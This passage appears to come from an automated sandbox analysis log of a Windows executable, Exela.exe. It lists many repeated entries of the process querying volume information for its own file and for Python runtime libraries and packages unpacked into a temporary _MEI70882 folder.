                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\libcrypto-1_1.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\libssl-1_1.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\multidict VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\pyexpat.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\python310.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_asyncio.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_bz2.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_cffi_backend.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_ctypes.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_socket.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\select.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_bz2.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_lzma.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_sqlite3.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_ssl.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_asyncio.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_overlapped.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\multidict VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\multidict VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\multidict VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\multidict VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\multidict\_multidict.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\multidict VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_hashlib.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\yarl VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\yarl VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\yarl VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\yarl VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\yarl\_quoting_c.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\unicodedata.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\propcache VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\propcache VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\propcache VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\propcache VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\propcache\_helpers_c.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
